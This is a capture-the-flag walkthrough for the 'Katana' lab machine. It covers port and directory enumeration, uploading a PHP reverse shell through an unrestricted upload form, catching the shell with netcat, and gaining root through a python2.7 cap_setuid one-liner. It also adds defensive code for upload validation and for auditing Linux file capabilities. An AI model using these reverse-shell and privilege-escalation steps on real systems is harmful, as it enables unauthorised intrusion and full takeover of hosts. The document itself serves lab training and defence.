pg-katana-play

Exploitation Guide for Katana

Summary

This machine is compromised through a file upload vulnerability in a web application: an uploaded PHP file is moved into a second web server's document root, where it is served and executed. Privileges are then escalated by abusing a misconfigured Linux file capability (cap_setuid) set on the python2.7 binary.

Enumeration

Nmap

We start off by running an nmap scan:

kali@kali:~$ sudo nmap -p- 192.168.120.154
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-20 11:33 EDT
Nmap scan report for 192.168.120.154
Host is up (0.030s latency).
Not shown: 65527 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
3389/tcp open  ms-wbt-server
7080/tcp open  empowerid
8088/tcp open  radan-http
8715/tcp open  unknown
9198/tcp open  unknown

Dirb

Using dirb and the default wordlist, we are able to brute-force and discover upload.html on port 8088:

kali@kali:~$ dirb http://192.168.120.155:8088 -X .html -r

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Thu Aug 20 14:05:14 2020
URL_BASE: http://192.168.120.155:8088/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive
EXTENSIONS_LIST: (.html) | (.html) [NUM = 1]

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.120.155:8088/ ----
+ http://192.168.120.155:8088/error404.html (CODE:200|SIZE:195)
+ http://192.168.120.155:8088/index.html (CODE:200|SIZE:655)
+ http://192.168.120.155:8088/upload.html (CODE:200|SIZE:6480)

-----------------
END_TIME: Thu Aug 20 14:07:40 2020
DOWNLOADED: 4612 - FOUND: 3

Exploitation

File Upload Vulnerability

Navigating to http://192.168.120.155:8088/upload.html, we see a couple of file upload controls. We are able to upload the PHP reverse shell available at /usr/share/webshells/php/php-reverse-shell.php:

kali@kali:~$ locate php-reverse-shell.php
...
/usr/share/webshells/php/php-reverse-shell.php
...
kali@kali:~$

Set the local port to 4444 in the PHP reverse shell. We can choose either control for our upload. After selecting the prepared PHP reverse shell, click Submit Query. The following message appears:

Please wait for 1 minute!. Please relax!.

File : file1
Name :
Type :
Path :
Size : 0
Please wait for 1 minute!. Please relax!.

file is empty, not stored.

File : file2
Name : php-reverse-shell.php
Type : application/x-php
Path : /tmp/phpFjoLWh
Size : 5495
Please wait for 1 minute!. Please relax!.

Moved to other web server: /tmp/phpFjoLWh ====> /opt/manager/html/katana_php-reverse-shell.php
MD5 : 8783aa0d056e9e74e9d9856605d072a5
Size : 5495 bytes

The important part is this line, which shows that the upload keeps its original name (with a katana_ prefix) and its .php extension, and is moved into the document root of another web server:

Moved to other web server: /tmp/phpFjoLWh ====> /opt/manager/html/katana_php-reverse-shell.php
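The upload handler above accepts any file name and extension, preserves the .php extension, and copies the file into a directory a web server executes scripts from. As an added example (not code from the Katana machine or its author), the following Python upload validator shows the checks that would have rejected this upload: an extension allowlist, rejection of interpreted extensions anywhere in the name, a magic-byte check against the claimed type, a size limit, and a random storage name. The allowed types, limits and sample inputs are constructed for the example.

```python
import os
import secrets

# Allowlist of accepted extensions and the magic bytes each must begin with.
# Constructed for this example; a real application tailors this to what it needs.
ALLOWED_TYPES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}

# Interpreted extensions that must never land in a document root,
# even as a middle component (shell.php.png).
EXECUTABLE_EXTS = {".php", ".phtml", ".php3", ".php4", ".php5", ".phar",
                   ".cgi", ".pl", ".py", ".sh"}

MAX_SIZE = 2 * 1024 * 1024  # 2 MiB, constructed limit


class UploadRejected(ValueError):
    """Raised with a short reason when an upload fails validation."""


def validate_upload(filename, data):
    """Return a safe random storage name for an accepted upload, or raise UploadRejected.

    The client-supplied Content-Type is deliberately not consulted: it is attacker
    controlled (the Katana app happily printed 'application/x-php' and stored the file).
    """
    if not data:
        raise UploadRejected("empty file")
    if len(data) > MAX_SIZE:
        raise UploadRejected("file too large")

    # Drop any directory components so '../' in the name cannot steer the write.
    base = os.path.basename(filename)
    parts = base.lower().split(".")

    # Reject an interpreted extension anywhere after the first component.
    for part in parts[1:]:
        if "." + part in EXECUTABLE_EXTS:
            raise UploadRejected("executable extension in name")

    ext = "." + parts[-1] if len(parts) > 1 else ""
    if ext not in ALLOWED_TYPES:
        raise UploadRejected("extension not allowed")

    # The content must actually look like the type the extension claims.
    if not data.startswith(ALLOWED_TYPES[ext]):
        raise UploadRejected("content does not match extension")

    # Never reuse the user's name; store under a random name with the verified extension.
    return secrets.token_hex(16) + ext


def check_upload(filename, data):
    """Convenience wrapper: (True, storage_name) or (False, reason)."""
    try:
        return True, validate_upload(filename, data)
    except UploadRejected as exc:
        return False, str(exc)


if __name__ == "__main__":
    # Constructed sample uploads, including the two cases seen on the Katana page:
    # an empty 'file1' and a 'php-reverse-shell.php' upload.
    png = ALLOWED_TYPES[".png"] + b"\x00" * 32
    for name, data in [
        ("file1", b""),
        ("php-reverse-shell.php", b"<?php system($_GET['c']); ?>"),
        ("shell.php.png", png),
        ("cat.png", b"<?php echo 1; ?>"),
        ("../../cat.png", png),
    ]:
        print("%-24s -> %s" % (name, check_upload(name, data)))
```

Serving the stored files from a directory the web server never executes scripts from (no PHP handler, or a separate static host) is the second half of the mitigation; the validator alone does not help if a renamed file can still be interpreted.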

First, start a netcat listener on port 4444. From the nmap scan, we saw an open port 8715. Using some guesswork together with the message above, we can trigger the reverse shell by navigating to http://192.168.120.155:8715/katana_php-reverse-shell.php:

kali@kali:~$ nc -lvp 4444
listening on [any] 4444 ...
192.168.120.155: inverse host lookup failed: Unknown host
connect to [192.168.118.3] from (UNKNOWN) [192.168.120.155] 57806
Linux katana 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64 GNU/Linux
 13:36:02 up 1 min,  0 users,  load average: 0.03, 0.02, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@katana:/$

Escalation

Checking File Capabilities

Using getcap with the recursive flag from the root directory, we see that the cap_setuid file capability is set on python2.7 with the +ep flags (effective and permitted):

www-data@katana:~$ getcap -r / 2>/dev/null
getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python2.7 = cap_setuid+ep
www-data@katana:~$

Linux file capabilities are maintained by the kernel and work similarly to SUID: they let an executable start with privileges its caller does not have. The kernel's privilege checks for a thread are based on capabilities, which break the actions normally reserved for root into smaller, separately grantable units. A file's capability sets are stored in an extended attribute named security.capability.
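A defender looking for this misconfiguration can audit getcap output mechanically. The following Python script is an added example (not from the Katana machine or its author): it parses getcap lines in both the older "path = cap+flags" style shown above and the newer "path cap=flags" style printed by recent libcap, flags capabilities that let a process change identity or bypass file permissions, and rates a hit on a general-purpose interpreter as critical, since that is equivalent to a root SUID binary. The dangerous-capability list, the interpreter pattern and the sample lines other than the two taken from this page are assumptions of the example.

```python
import os
import re
import subprocess

# Capabilities that let a process change uid/gid, bypass DAC, or reach the kernel.
# Any of these on an interpreter is as good as a root SUID shell. Constructed list.
DANGEROUS = {
    "cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
    "cap_chown", "cap_fowner", "cap_setfcap", "cap_sys_admin",
    "cap_sys_module", "cap_sys_ptrace", "cap_sys_rawio",
}

# Binaries that will run arbitrary caller-supplied code (assumed pattern).
INTERPRETER_RE = re.compile(r"^(python|perl|ruby|node|php|lua|bash|dash|sh)[0-9.]*$")

# One clause of cap_to_text(3) output: names, operator, flag letters.
CLAUSE_RE = re.compile(r"^([a-z0-9_,]+)([=+-])([eip]*)$")


def parse_getcap_line(line):
    """Parse one getcap line into (path, {capability: set(flags)}).

    Accepts both output styles:
        /usr/bin/ping = cap_net_raw+ep     (older libcap, as on the page)
        /usr/bin/ping cap_net_raw=ep       (libcap 2.41 and later)
    Returns None for blank or unparseable lines.
    """
    line = line.strip()
    if not line:
        return None
    if " = " in line:
        path, capstr = line.split(" = ", 1)
    else:
        parts = line.split(None, 1)
        if len(parts) != 2:
            return None
        path, capstr = parts

    caps = {}
    for clause in capstr.split():
        match = CLAUSE_RE.match(clause)
        if not match:
            return None
        names, op, flags = match.groups()
        for name in names.split(","):
            if op == "-":
                caps[name] = caps.get(name, set()) - set(flags)
            else:
                caps.setdefault(name, set()).update(flags)
    return path, caps


def audit_getcap(output):
    """Return a list of findings for files whose capability set is risky."""
    findings = []
    for line in output.splitlines():
        parsed = parse_getcap_line(line)
        if not parsed:
            continue
        path, caps = parsed
        # Effective or merely permitted: a permitted capability can be raised
        # into the effective set by the program itself.
        risky = sorted(c for c, f in caps.items() if c in DANGEROUS and f & {"e", "p"})
        if not risky:
            continue
        is_interpreter = bool(INTERPRETER_RE.match(os.path.basename(path)))
        findings.append({
            "path": path,
            "caps": risky,
            "severity": "critical" if is_interpreter else "high",
            "fix": "setcap -r %s" % path,   # setcap -r strips the security.capability xattr
        })
    return findings


# Constructed sample: the two lines from the Katana walkthrough plus two
# invented lines in the newer getcap output format.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python2.7 = cap_setuid+ep
/usr/sbin/arping cap_net_raw=ep
/usr/bin/gdb cap_sys_ptrace=eip
"""


if __name__ == "__main__":
    try:
        real = subprocess.run(["getcap", "-r", "/"], capture_output=True,
                              text=True, check=False).stdout
    except FileNotFoundError:
        real = ""
    for finding in audit_getcap(real or SAMPLE_GETCAP):
        print("%(severity)-8s %(path)s %(caps)s  ->  %(fix)s" % finding)
```

Run as root on a host it audits the live system; elsewhere it falls back to the constructed sample. The cap_net_raw on ping is expected on Debian and is not reported; the cap_setuid on python2.7 is exactly the finding that a periodic scan or a file-integrity monitor watching the security.capability attribute should raise.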

We are able to abuse the capabilities misconfiguration of python2.7 to drop ourselves into a root shell:

www-data@katana:~$ whoami
whoami
www-data
www-data@katana:~$ /usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash")'
<c 'import os; os.setuid(0); os.system("/bin/bash")'
root@katana:~# whoami
whoami
root
root@katana:~# 


Unintended way: brute-force SSH, and find katana /root.
